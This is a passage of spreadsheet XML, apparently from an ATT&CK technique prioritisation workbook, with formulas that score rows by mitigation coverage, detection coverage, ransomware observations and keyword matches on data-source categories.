        <f t="array" ref="AF162">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC162)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG162" s="25">
        <f>IF(AF162="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH162" s="25" t="str" cm="1">
        <f t="array" ref="AH162">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC162)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI162" s="25">
        <f>IF(AH162="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ162" s="25" t="str" cm="1">
        <f t="array" ref="AJ162">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC162)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK162" s="25">
        <f>IF(AJ162="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL162" s="25" t="str" cm="1">
        <f t="array" ref="AL162">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC162)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM162" s="25">
        <f>IF(AL162="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN162" s="58">
        <v>2</v>
      </c>
      <c r="AO162" s="51">
        <v>1</v>
      </c>
      <c r="AP162" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.11572761904761905</v>
      </c>
      <c r="AQ162" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.16353650793650792</v>
      </c>
      <c r="AR162" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.16353650793650792</v>
      </c>
      <c r="AS162" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT162" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU16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63" spans="1:47" ht="32.1">
      <c r="A163" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.4466666666666663E-2</v>
      </c>
      <c r="B163" s="25">
        <f>SUM(H163,M163,V163)*(1+SUM(AE163,AG163,AI163,AK163,AM163))</f>
        <v>0.54466666666666663</v>
      </c>
      <c r="C163" s="25" t="s">
        <v>736</v>
      </c>
      <c r="D163" s="25" t="s">
        <v>486</v>
      </c>
      <c r="E163" s="25" t="s">
        <v>737</v>
      </c>
      <c r="F163" s="51">
        <v>1</v>
      </c>
      <c r="G163" s="51">
        <v>1</v>
      </c>
      <c r="H163" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I163">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J163">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K163">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L163">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M163" s="25">
        <v>0</v>
      </c>
      <c r="N163" s="51">
        <v>0</v>
      </c>
      <c r="O163" s="51">
        <v>1</v>
      </c>
      <c r="P163" s="51">
        <v>0</v>
      </c>
      <c r="Q163" s="51">
        <v>0</v>
      </c>
      <c r="R163" s="52" t="s">
        <v>738</v>
      </c>
      <c r="S163" s="51">
        <v>17</v>
      </c>
      <c r="T163" s="51" t="s">
        <v>488</v>
      </c>
      <c r="U163" s="51">
        <v>15</v>
      </c>
      <c r="V163" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.30952380952380953</v>
      </c>
      <c r="W163">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>32</v>
      </c>
      <c r="X163">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.58181818181818179</v>
      </c>
      <c r="Y163">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.58181818181818179</v>
      </c>
      <c r="Z163">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA163">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB163">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC163" s="29" t="s">
        <v>739</v>
      </c>
      <c r="AD163" s="25" t="str" cm="1">
        <f t="array" ref="AD163">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC163)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE163" s="25">
        <f>IF(AD163="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF163" s="25" t="str" cm="1">
        <f t="array" ref="AF163">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC163)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG163" s="25">
        <f>IF(AF163="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH163" s="25" t="str" cm="1">
        <f t="array" ref="AH163">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC163)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI163" s="25">
        <f>IF(AH163="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ163" s="25" t="str" cm="1">
        <f t="array" ref="AJ163">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC163)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK163" s="25">
        <f>IF(AJ163="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL163" s="25" t="str" cm="1">
        <f t="array" ref="AL163">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC163)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM163" s="25">
        <f>IF(AL163="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN163" s="60">
        <v>0</v>
      </c>
      <c r="AO163" s="51">
        <v>0</v>
      </c>
      <c r="AP163" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.4466666666666663E-2</v>
      </c>
      <c r="AQ163" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.18155555555555555</v>
      </c>
      <c r="AR163" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.18155555555555555</v>
      </c>
      <c r="AS163" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT163" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU16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64" spans="1:47" ht="32.1">
      <c r="A164" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.0698095238095242E-2</v>
      </c>
      <c r="B164" s="25">
        <f>SUM(H164,M164,V164)*(1+SUM(AE164,AG164,AI164,AK164,AM164))</f>
        <v>0.40698095238095244</v>
      </c>
      <c r="C164" s="25" t="s">
        <v>740</v>
      </c>
      <c r="D164" s="25" t="s">
        <v>741</v>
      </c>
      <c r="E164" s="25" t="s">
        <v>742</v>
      </c>
      <c r="F164" s="51">
        <v>1</v>
      </c>
      <c r="G164" s="51">
        <v>0</v>
      </c>
      <c r="H164" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I164">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J164">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K164">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L164">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M164" s="25">
        <v>0</v>
      </c>
      <c r="N164" s="51">
        <v>0</v>
      </c>
      <c r="O164" s="51">
        <v>1</v>
      </c>
      <c r="P164" s="51">
        <v>0</v>
      </c>
      <c r="Q164" s="51">
        <v>0</v>
      </c>
      <c r="R164" s="52" t="s">
        <v>743</v>
      </c>
      <c r="S164" s="51">
        <v>14</v>
      </c>
      <c r="T164" s="52" t="s">
        <v>744</v>
      </c>
      <c r="U164" s="51">
        <v>18</v>
      </c>
      <c r="V164" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.30952380952380953</v>
      </c>
      <c r="W164">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>32</v>
      </c>
      <c r="X164">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.58181818181818179</v>
      </c>
      <c r="Y164">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.58181818181818179</v>
      </c>
      <c r="Z164">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA164">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB164">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC164" s="29" t="s">
        <v>745</v>
      </c>
      <c r="AD164" s="25" t="str" cm="1">
        <f t="array" ref="AD164">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC164)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE164" s="25">
        <f>IF(AD164="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF164" s="25" t="str" cm="1">
        <f t="array" ref="AF164">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC164)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG164" s="25">
        <f>IF(AF164="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH164" s="25" t="str" cm="1">
        <f t="array" ref="AH164">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC164)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI164" s="25">
        <f>IF(AH164="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ164" s="25" t="str" cm="1">
        <f t="array" ref="AJ164">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC164)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK164" s="25">
        <f>IF(AJ164="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL164" s="25" t="str" cm="1">
        <f t="array" ref="AL164">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC164)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM164" s="25">
        <f>IF(AL164="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN164" s="52">
        <v>0</v>
      </c>
      <c r="AO164" s="51">
        <v>0</v>
      </c>
      <c r="AP164" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.0698095238095242E-2</v>
      </c>
      <c r="AQ164" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.13566031746031748</v>
      </c>
      <c r="AR164" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.13566031746031748</v>
      </c>
      <c r="AS164" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT164" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU16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65" spans="1:47" ht="32.1">
      <c r="A165" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.0476190476190471E-2</v>
      </c>
      <c r="B165" s="25">
        <f>SUM(H165,M165,V165)*(1+SUM(AE165,AG165,AI165,AK165,AM165))</f>
        <v>0.40476190476190477</v>
      </c>
      <c r="C165" s="25" t="s">
        <v>746</v>
      </c>
      <c r="D165" s="25" t="s">
        <v>358</v>
      </c>
      <c r="E165" s="25" t="s">
        <v>747</v>
      </c>
      <c r="F165" s="51">
        <v>1</v>
      </c>
      <c r="G165" s="51">
        <v>1</v>
      </c>
      <c r="H165" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I165">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J165">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K165">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L165">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M165" s="25">
        <v>0</v>
      </c>
      <c r="N165" s="51">
        <v>0</v>
      </c>
      <c r="O165" s="51">
        <v>0</v>
      </c>
      <c r="P165" s="51">
        <v>0</v>
      </c>
      <c r="Q165" s="51">
        <v>0</v>
      </c>
      <c r="R165" s="52" t="s">
        <v>748</v>
      </c>
      <c r="S165" s="51">
        <v>17</v>
      </c>
      <c r="T165" s="51" t="s">
        <v>488</v>
      </c>
      <c r="U165" s="51">
        <v>15</v>
      </c>
      <c r="V165" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.30476190476190479</v>
      </c>
      <c r="W165">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>32</v>
      </c>
      <c r="X165">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.58181818181818179</v>
      </c>
      <c r="Y165">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.58181818181818179</v>
      </c>
      <c r="Z165">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA165">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB165">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC165" s="29" t="s">
        <v>467</v>
      </c>
      <c r="AD165" s="25" t="str" cm="1">
        <f t="array" ref="AD165">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC165)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE165" s="25">
        <f>IF(AD165="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF165" s="25" t="str" cm="1">
        <f t="array" ref="AF165">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC165)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG165" s="25">
        <f>IF(AF165="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH165" s="25" t="str" cm="1">
        <f t="array" ref="AH165">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC165)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI165" s="25">
        <f>IF(AH165="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ165" s="25" t="str" cm="1">
        <f t="array" ref="AJ165">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC165)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK165" s="25">
        <f>IF(AJ165="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL165" s="25" t="str" cm="1">
        <f t="array" ref="AL165">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC165)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM165" s="25">
        <f>IF(AL165="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN165" s="52">
        <v>0</v>
      </c>
      <c r="AO165" s="51">
        <v>0</v>
      </c>
      <c r="AP165" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.0476190476190471E-2</v>
      </c>
      <c r="AQ165" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.13492063492063491</v>
      </c>
      <c r="AR165" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.13492063492063491</v>
      </c>
      <c r="AS165" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT165" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU16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66" spans="1:47" ht="32.1">
      <c r="A166" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.0159047619047629E-2</v>
      </c>
      <c r="B166" s="25">
        <f>SUM(H166,M166,V166)*(1+SUM(AE166,AG166,AI166,AK166,AM166))</f>
        <v>0.40159047619047628</v>
      </c>
      <c r="C166" s="25" t="s">
        <v>749</v>
      </c>
      <c r="D166" s="25" t="s">
        <v>741</v>
      </c>
      <c r="E166" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F166" s="51">
        <v>1</v>
      </c>
      <c r="G166" s="51">
        <v>0</v>
      </c>
      <c r="H166" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I166">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J166">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K166">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L166">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M166" s="25">
        <v>0</v>
      </c>
      <c r="N166" s="51">
        <v>0</v>
      </c>
      <c r="O166" s="51">
        <v>0</v>
      </c>
      <c r="P166" s="51">
        <v>0</v>
      </c>
      <c r="Q166" s="51">
        <v>0</v>
      </c>
      <c r="R166" s="52" t="s">
        <v>743</v>
      </c>
      <c r="S166" s="51">
        <v>14</v>
      </c>
      <c r="T166" s="52" t="s">
        <v>744</v>
      </c>
      <c r="U166" s="51">
        <v>18</v>
      </c>
      <c r="V166" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.30476190476190479</v>
      </c>
      <c r="W166">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>32</v>
      </c>
      <c r="X166">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.58181818181818179</v>
      </c>
      <c r="Y166">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.58181818181818179</v>
      </c>
      <c r="Z166">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA166">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB166">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC166" s="29" t="s">
        <v>745</v>
      </c>
      <c r="AD166" s="25" t="str" cm="1">
        <f t="array" ref="AD166">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC166)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE166" s="25">
        <f>IF(AD166="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF166" s="25" t="str" cm="1">
        <f t="array" ref="AF166">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC166)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG166" s="25">
        <f>IF(AF166="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH166" s="25" t="str" cm="1">
        <f t="array" ref="AH166">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC166)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI166" s="25">
        <f>IF(AH166="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ166" s="25" t="str" cm="1">
        <f t="array" ref="AJ166">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC166)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK166" s="25">
        <f>IF(AJ166="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL166" s="25" t="str" cm="1">
        <f t="array" ref="AL166">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC166)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM166" s="25">
        <f>IF(AL166="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN166" s="60">
        <v>0</v>
      </c>
      <c r="AO166" s="51">
        <v>0</v>
      </c>
      <c r="AP166" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.0159047619047629E-2</v>
      </c>
      <c r="AQ166" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.1338634920634921</v>
      </c>
      <c r="AR166" s="25">
